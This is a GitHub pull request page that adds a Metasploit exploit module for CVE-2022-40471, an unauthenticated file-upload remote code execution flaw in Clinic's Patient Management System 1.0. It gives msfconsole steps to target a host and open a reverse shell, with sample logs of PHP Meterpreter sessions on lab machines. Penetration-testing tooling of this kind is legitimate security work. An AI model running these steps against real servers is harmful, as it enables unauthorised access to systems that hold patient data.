Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New Exploit Module for CVE-2022-40471: Clinic's Patient Management System 1.0 - Unauthenticated RCE #19733

Merged
merged 7 commits into from
Dec 18, 2024

Conversation

aaryan-11-x
Copy link
Contributor

This pull request introduces an exploit module for Metasploit that targets an unauthenticated Remote Code Execution (RCE) vulnerability in Clinic's Patient Management System (CPMS) version 1.0. The vulnerability is due to improper file validation in the system's file upload feature, allowing an attacker to upload arbitrary PHP files, such as a PHP web shell, which can then be executed remotely. The attack is facilitated by the presence of a directory listing feature in /pms/user_images, where the uploaded PHP file can be accessed via a publicly accessible URL.

CVE-2022-40471
EDB-ID: 51779

Vulnerable Application:

Clinic's Patient Management System 1.0 is vulnerable to this issue, which allows attackers to upload a PHP shell to the server and execute arbitrary PHP code. This is caused by misconfiguration in the file upload functionality, which does not properly validate uploaded files.

The application can be downloaded from here

Verification Steps:

  1. Install the Clinic's Patient Management System 1.0 on the target web server.
    • Follow the setup instructions for either Windows or Linux as provided in the documentation.
  2. Start msfconsole and load the new exploit module:
    msfconsole
    use exploit/multi/http/clinic_pms_fileupload_rce
  3. Set the required options:
    set rport <port>
    set rhost <ip>
    set targeturi /pms
  4. Check if the target is vulnerable:
    check
    If vulnerable, the output will indicate the target is exploitable:
    [+] <IP> The target is vulnerable.
    
  5. Set up the listener for the reverse shell:
    set lport <port>
    set lhost <ip>
  6. Launch the exploit:
    exploit
  7. If successful, a PHP Meterpreter shell will be received.

Example Scenarios:

  • Linux Target:

    msf exploit(multi/http/clinic_pms_fileupload_rce) > check
    [+] 127.0.0.1:80 - The target is vulnerable.
    
    msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
    [*] Started reverse TCP handler on 192.168.1.104:4444 
    [*] Detected OS: linux
    [*] Uploading PHP Meterpreter payload as zuX7FDRe.php...
    [+] Payload uploaded successfully!
    [*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php...
    [*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530
    meterpreter > sysinfo
    Computer    : kali
    OS          : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
    Meterpreter : php/linux
    meterpreter >
  • Windows Target:

    msf exploit(multi/http/clinic_pms_fileupload_rce) > check
    [+] 192.168.1.103:80 - The target is vulnerable.
    
    msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
    [*] Started reverse TCP handler on 192.168.1.104:4444 
    [*] Detected OS: winnt
    [*] Uploading PHP Meterpreter payload as lgTprVq5.php...
    [+] Payload uploaded successfully!
    [*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php...
    [*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530
    meterpreter > sysinfo
    Computer    : DESKTOP-VE9J36K
    OS          : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
    Meterpreter : php/windows
    meterpreter >

Options:

  • TARGETURI: (Required) The base path to the Clinic Patient Management System (default: /pms).
  • LISTING_DELAY: (Optional) The delay before fetching the directory listing after uploading the shell (default: 2 seconds).

This exploit was tested successfully on both Linux and Windows environments, providing a fully functional RCE attack vector against the vulnerable CPMS version 1.0.

@aaryan-11-x
Copy link
Contributor Author

Hi can you tell me what's the issue with the check? The module works perfectly in my Kali Linux environment

@msutovsky-r7
Copy link
Contributor

Hi aaryan-11-x, there was some issue with different PR that got merged, which caused tests to fail. You created your branch from the version where merged changes cause checks to fail. You can close this PR, checkout from upstream again and submit new PR or you can keep this one and we will merge changes later on. Otherwise, your PR is in review right now.

@aaryan-11-x
Copy link
Contributor Author

Ok. I'll continue with this PR only.

@msutovsky-r7 msutovsky-r7 merged commit 531ed16 into rapid7:master Dec 18, 2024
37 checks passed
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 19, 2024
@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Dec 19, 2024

Release Notes

New exploit module for Clinic's Patient Management System 1.0, also dubbed as CVE-2022-40471. The module exploits unrestricted file upload, which can be further used to get remote code execution (RCE) through a malicious PHP file.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Status: Done
Development

Successfully merging this pull request may close these issues.

2 participants